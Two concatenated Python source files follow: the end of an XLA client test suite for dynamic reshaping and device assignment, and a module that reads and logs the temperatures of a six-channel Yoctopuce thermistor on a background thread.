} for dtype in int_dtypes + float_dtypes)
def testReshape2D(self, dtype):
arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
arg1 = np.array(2, dtype=np.int32)
expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
c = self._NewComputation()
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
np.testing.assert_equal)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testDynamicShapeArgs(self, dtype):
full_size = 10
dynamic_shape_size = 4
# subcomputation 1
binary_add_builder = self._NewComputation()
scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
ops.Add(
ops.Parameter(binary_add_builder, 0, scalar_shape),
ops.Parameter(binary_add_builder, 1, scalar_shape))
# subcomputation 2
reshape_reduce_builder = self._NewComputation()
dshape = xla_client.Shape.array_shape(
np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
ops.Reduce(
reshape_reduce_builder,
operands=[reshape_reduce_p],
init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
computation=binary_add_builder.build(),
dimensions_to_reduce=[0])
# main computation: sum(range(full_size)[:dynamic_shape_size])
c = self._NewComputation()
arg = np.array(dynamic_shape_size, dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
reshaped = ops.DynamicReshape(
ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
[full_size], [True])
ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
class DeviceAssignmentTest(ComputationTest):
def testSerialize(self):
shape = (3, 4)
device_assignment = xla_client.DeviceAssignment.create(
np.arange(np.prod(shape)).reshape(*shape))
self.assertEqual(device_assignment.replica_count(), shape[0])
self.assertEqual(device_assignment.computation_count(), shape[1])
serialized = device_assignment.serialize()
self.assertIsInstance(serialized, bytes)
self.assertNotEmpty(serialized)
tests.append(DeviceAssignmentTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
backends = {
"cpu": xla_client.make_cpu_client,
"gpu": xla_client.make_gpu_client,
}
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target platform.")
# pylint: disable=unnecessary-lambda
InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
# pylint: enable=unnecessary-lambda
absltest.main()
|
YoctoThermistor_FISH.py
|
#The files/folders that need to be in the executing folder are:
# yocto_api.py
# yocto_temperature.py
# folder: cdll
#Available from the Yoctopuce website:
#http://www.yoctopuce.com/EN/libraries.php Python libraries
#TODO:
#Make plotting function
#Buffer creation is commented out.
import os,sys
import time
import threading
import csv
import numpy as np
import collections
from yocto_api import *
from yocto_temperature import *
class FISH_thermistor():
"""
Class to initiate and read the temperature of a Yoctopuce Maxi Thermistor
"""
temperature = []
def __init__(self, logical_name = None, serial_number = None, **kwargs):
"""
        Instantiate the sensor, check if it works, and open the temperature channels
Input:
`logical_name`: Logical name of the sensor (set in the Yoctopuce
software)
        `serial_number`: Unchangeable serial number of the sensor (can be found
in the Yoctopuce software)
One of the two is required.
"""
self.logical_name = logical_name
self.serial_number = serial_number
self.errmsg=YRefParam()
# Setup the API to use local USB devices
        if YAPI.RegisterHub("usb", self.errmsg) != YAPI.SUCCESS:
            sys.exit("init error: " + self.errmsg.value)
if self.logical_name != None:
self.target = self.logical_name
elif self.serial_number != None:
self.target = self.serial_number
elif self.serial_number == None and self.logical_name == None:
self.thermistor_die('Specify logical name or serial number')
#Instantiate sensor
self.sensor= YTemperature.FindTemperature(self.target + '.temperature1')
#Check if sensor is valid and live
if self.sensor is None :
self.thermistor_die('No module connected, check connection and name')
if not(self.sensor.isOnline()):
self.thermistor_die('device not connected')
#Get sensor serial number
self.serial=self.sensor.get_module().get_serialNumber()
#Initiate channels
self.init_channels()
def thermistor_die(self, msg):
sys.exit(msg+' (check name or USB cable)')
def init_channels(self):
global channel1, channel2, channel3, channel4, channel5, channel6
channel1 = YTemperature.FindTemperature(self.serial + '.temperature1')
channel2 = YTemperature.FindTemperature(self.serial + '.temperature2')
channel3 = YTemperature.FindTemperature(self.serial + '.temperature3')
channel4 = YTemperature.FindTemperature(self.serial + '.temperature4')
channel5 = YTemperature.FindTemperature(self.serial + '.temperature5')
channel6 = YTemperature.FindTemperature(self.serial + '.temperature6')
def read_temperature(self):
"""
        Get the temperature values of the 6 channels.
        Returns the 6 temperatures individually (not as a list).
"""
temp1 = channel1.get_currentValue()
temp2 = channel2.get_currentValue()
temp3 = channel3.get_currentValue()
temp4 = channel4.get_currentValue()
temp5 = channel5.get_currentValue()
temp6 = channel6.get_currentValue()
return temp1, temp2, temp3, temp4, temp5, temp6
    def pr(self, seconds):
        """Print the temperature readings once per second for `seconds` seconds."""
        for _ in range(seconds):
            print(self.read_temperature())
            YAPI.Sleep(1000)
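# Hedged usage sketch (not part of the original module): read the six channels
# once with FISH_thermistor alone, without the background daemon class below.
# The logical name 'my_thermistor' is a placeholder; substitute your own logical
# name or serial number as configured in the Yoctopuce software.
def example_single_reading(logical_name='my_thermistor'):
    """Read all six temperature channels once and return them as a list."""
    sensor = FISH_thermistor(logical_name=logical_name)
    temps = sensor.read_temperature()  # tuple of six floats in degrees Celsius
    print('Channel temperatures:', temps)
    return list(temps)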
class FISH_temperature_deamon():
"""
    Class that can run the Yoctopuce Maxi Thermistor in the background
    on a separate thread and plot the data live. All data will be
    saved to a .csv file.
Input:
`logical_name`(str): logical name of the sensor
    `serial_number`(str): serial number of the sensor
`exp_name`(str): Experiment name to track files
`buffer_size`(int): number of hours to plot in graph (default=2)
`log_interval`(int): Interval in seconds to save the temperature data.
default = 1 second
"""
def __init__(self, logical_name = None, serial_number = None,
exp_name = None, buffer_size=2, log_interval=1):
#Initiate sensor using the FISH_thermistor class
if logical_name != None:
self.sensor = FISH_thermistor(logical_name = logical_name)
if serial_number != None:
self.sensor = FISH_thermistor(serial_number = serial_number)
#Setup log file and exp name
self.exp_name = exp_name
#Creates log file and returns the file name
self.temp_log_filename = self.temp_log_file(self.exp_name)
#make buffers for graph with length in hours
#self.make_buffers(buffer_size)
self.log_interval = log_interval
    # Worker that reads the temp from the sensor, saves it to file, plots it and makes it available, every second.
def worker(self): #Can not pass the sensor as argument here, threading will complain
"""
        Thread worker function. Reads the temperature, saves it to a file
        and makes the data available for other programs using the get_temp()
        function.
"""
thread_name = threading.currentThread().getName()
        print('Started FISH_temperature_deamon in the background on thread: {}'.format(thread_name))
global current_temp
current_temp = []
count = 0
while True:
tic = time.time()
event_flag.clear()
#Get current temperature
current_temp = self.background_get_temp(self.sensor)
#write to file every interval
if count % self.log_interval == 0:
self.write_temp_log_file(self.temp_log_filename, current_temp)
count = 0
            #update data for plot
#self.update_temp_data_buffer(current_temp)
#update plot
count += 1
event_flag.set()
toc = time.time()
execute_time = toc - tic
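            # Aim for a ~1 second cadence: subtract the time spent reading and
            # writing, and avoid a negative sleep if an iteration took longer
            # than 1 second.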
if execute_time > 1:
execute_time = 0.001
time.sleep(1 - execute_time)
return current_temp
    # Low level functions used in __init__
def temp_log_file(self, exp_name):
"""Make temperature log file, return file name"""
if not os.path.exists('Temperature_log_files'):
os.makedirs('Temperature_log_files')
if exp_name != None:
file_name = ('Temperature_log_files/' + exp_name + '_temp_log_' +
str(time.strftime('%d-%m-%Y_%H-%M-%S')) + '.csv')
else:
file_name = ('Temperature_log_files/' +'temp_log_' +
time.strftime('%d-%m-%Y_%H-%M-%S') + '.csv')
print(file_name)
self.logger_path = file_name
with open(file_name, 'w', newline='') as temp_log:
writer = csv.writer(temp_log)
header = [['Timestamp','Sensor1','Sensor2','Sensor3','Sensor4',
'Sensor5','Sensor6']]
writer.writerows(header)
return file_name
def make_buffers(self, buffer_size):
"""
Make 7 buffers for time and temperature
Input:
`buffer_size`(int): number of hours to buffer (default=2)
Buffers are fixed size 'deque' objects
"""
buffer_size = buffer_size * 60 * 60 #buffer size in seconds
self.time_data = collections.deque([None], maxlen=buffer_size)
self.sensor1_data = collections.deque([None], maxlen=buffer_size)
self.sensor2_data = collections.deque([None], maxlen=buffer_size)
self.sensor3_data = collections.deque([None], maxlen=buffer_size)
self.sensor4_data = collections.deque([None], maxlen=buffer_size)
self.sensor5_data = collections.deque([None], maxlen=buffer_size)
self.sensor6_data = collections.deque([None], maxlen=buffer_size)
    # Low level functions used in the worker
def background_get_temp(self, sensor):
"""Get the current time and temperature from sensor"""
data = []
now = time.strftime('%d-%m-%Y_%H:%M:%S')
temperature = self.sensor.read_temperature()
data.append(now)
data += temperature
return data
def write_temp_log_file(self, file_name, data):
"""Write new data to temperature log file"""
with open(file_name, 'a', newline='') as temp_log:
writer = csv.writer(temp_log)
writer.writerows([data])
def update_temp_data_buffer(self, new_data):
"""Append new data to the data buffers"""
self.time_data.append(new_data[0])
self.sensor1_data.append(new_data[1])
self.sensor2_data.append(new_data[2])
self.sensor3_data.append(new_data[3])
self.sensor4_data.append(new_data[4])
self.sensor5_data.append(new_data[5])
self.sensor6_data.append(new_data[6])
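    # Hedged sketch addressing the "Make plotting function" TODO at the top of
    # this file. Assumptions: matplotlib is installed (it is not imported
    # elsewhere in this module) and make_buffers() has been called so the deque
    # buffers exist; neither is true by default.
    def plot_temp_buffers(self):
        """Plot the buffered temperatures of all six channels."""
        import matplotlib.pyplot as plt
        fig, ax = plt.subplots()
        channels = [self.sensor1_data, self.sensor2_data, self.sensor3_data,
                    self.sensor4_data, self.sensor5_data, self.sensor6_data]
        for i, channel_data in enumerate(channels, start=1):
            samples = [t for t in channel_data if t is not None]
            ax.plot(range(len(samples)), samples, label='Sensor{}'.format(i))
        ax.set_xlabel('Sample number (~1 per second)')
        ax.set_ylabel('Temperature (degrees C)')
        ax.legend()
        plt.show()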
    # Starting the daemon in a separate thread
def deamon_start(self):
global event_flag
event_flag = threading.Event()
temp_thread = threading.Thread(target=self.worker)#, args = self.sensor)
temp_thread.setDaemon(True) #It will end the thread when the main process is done or quit
temp_thread.start()
time.sleep(1)
    # Function to get the temperature from the main thread without interfering with the worker.
def get_temp(self):
"""Get the current time and temperature from deamon"""
while not event_flag.isSet():
event_is_set = event_flag.wait(0.1)
return current_temp
if __name__ == "__main__":
x = FISH_temperature_deamon(serial_number = 'THRMSTR2-629D5')
x.deamon_start()
print('This is a test function that will print the temp every sec for the next 10 seconds')
for i in range (10):
print(x.get_temp())
#print('data buffer: ', x.sensor1_data[-20:])
time.sleep(1)
|